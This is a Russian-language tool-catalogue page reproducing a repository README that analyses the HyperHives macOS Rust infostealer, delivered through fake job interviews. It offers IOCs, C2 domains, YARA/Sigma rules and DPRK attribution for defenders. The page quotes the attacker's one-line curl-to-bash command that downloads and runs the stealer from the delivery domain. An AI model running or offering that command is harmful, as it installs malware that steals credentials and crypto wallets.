Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
hyperhives-macos-infostealer-analysis — Полный статический анализ HyperHives macOS Rust infostealer — 571 расшифрованных значений конфигурации, инфраструктура C2, атрибуция DPRK/Contagious Interview, правила YARA/Sigma, пакет STIX 2.1, слой ATT&CK Navigator | Kitploit
Инструменты/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Управление индикаторами компрометации (IOC)OSINT (Разведка открытых источников)Обратная инженерияФорензикаАнализ вредоносных программРазведка угрозСтатьи и ИсследованияОбучение и ОбразованиеПодобранные Ресурсы

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Полный статический анализ HyperHives macOS Rust infostealer — 571 расшифрованных значений конфигурации, инфраструктура C2, атрибуция DPRK/Contagious Interview, правила YARA/Sigma, пакет STIX 2.1, слой ATT&CK Navigator

РепозиторийСайт
314135 месяцев назадПроверено Kitploit
Поделиться

HyperHives macOS Infostealer — Полный технический анализ

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Разведка угроз: Rust-based универсальный бинарник macOS, доставляемый через поддельную цепочку собеседований на Wellfound (ранее AngelList). Оператор под псевдонимом «Felix» из «HyperHive» заманивал жертв запустить вредоносный установщик с macos.hyperhives.net. Этот репозиторий документирует полный статический анализ: восстановлено 571 зашифрованных значений конфигурации, включая C2-URL, Sentry DSN и 276 целевых ID расширений Chrome.

Образец SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2-доменcloudproxy.link
Домен доставкиmacos.hyperhives.net
Платформа-приманкаWellfound (ранее AngelList)
Псевдоним оператора«Felix» в «HyperHive»
VirusTotal9 / 63 детекций
КлассификацияПубличное раскрытие / набор IOCs
Последнее обновлениеАпрель 2026

Содержание

  • Пакеты threat intelligence
  • Структура репозитория
  • Быстрый старт
  • Кратко
  • 1 — Как это началось
  • 2 — Бинарник
  • 3 — Что он крадет
  • 4 — Расшифрованная C2-инфраструктура
  • 5 — Атрибуция
  • 6 — Криптоанализ
  • 7 — Карта MITRE ATT&CK
  • 8 — Справочник кошельков и ID расширений
  • 9 — Рекомендованные действия
  • 10 — Методология
  • Приложение A — Все 276 ID расширений Chrome
  • Область применения и ограничения
  • История версий
  • Вклад в проект
  • Лицензия

Пакеты threat intelligence

ФайлФорматНазначение
iocs.txtОбычный текстХеши, домены, URL, IP, email, Sentry ID — вставьте в блок-листы, MISP, OpenCTI
yara_rules.yarYARA 4.2+Поиск по хешу известного образца + эвристические строковые детекции для Mach-O
sigma_rules.ymlSigmaПравила прокси, DNS и создания процессов — настройте logsource под вашу SIEM
stix/bundle.jsonSTIX 2.1Машиночитаемый CTI-пакет с индикаторами, SDO вредоносного ПО, инфраструктурой, паттернами ATT&CK и связями
attack-navigator-layer.jsonATT&CK NavigatorИмпортируйте в ATT&CK Navigator для визуального покрытия техник

Структура репозитория```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## Быстрый старт

Поместите образец как `sample/installer_binary` (см. [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) для проверки хэша), затем:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

Файл compose налагает network_mode: none, read_only: true и отключает все возможности Linux. Полные правила обращения см. в SECURITY.md.


TL;DR

Объявление о вакансии на Wellfound (ранее AngelList) привело к цепочке социальной инженерии из нескольких писем от оператора под именем «Felix» из компании «HyperHive». После лестных отзывов о техническом опыте цели и назначения фиктивного собеседования, злоумышленник направил жертву «просмотреть продукт» на сайте hyperhives.net и специально изучить Settings → Diagnostics → Log — предлог для запуска следующего:``` curl -s https://macos.hyperhives.net/install | nohup bash &

Вредоносная нагрузка представляет собой **универсальный бинарник Mach-O размером 8,5 МБ** (x86_64 + arm64), скомпилированный на Rust. Статический анализ в изолированной Docker-лаборатории с эмуляцией процессора **570 уникальных вспомогательных процедур x86_64** позволил восстановить **все 571 зашифрованных значения конфигурации**, раскрыв:

- **C2:** `cloudproxy.link` — четыре HTTPS-эндпоинта
- **Sentry (атрибуция):** полный DSN с ID организации/проекта на `ingest.de.sentry.io`
- **Идентификатор сборки:** пользователь Cargo `rootr`, кодовое имя `force`, версия `9.12.1`
- **Цели:** 276 идентификаторов расширений Chrome (криптокошельки, менеджеры паролей, корпоративные учётные данные)

Тактика совпадает с **кампаниями Contagious Interview, связанными с КНДР** — фиктивные собеседования на легитимных платформах, многоэтапное построение доверия, доставка через `curl | bash`, Rust-стилер для macOS и кража криптовалютных данных.

---

## 1 — Как это началось

### Приманка: фиктивное собеседование на Wellfound
Скачать инструмент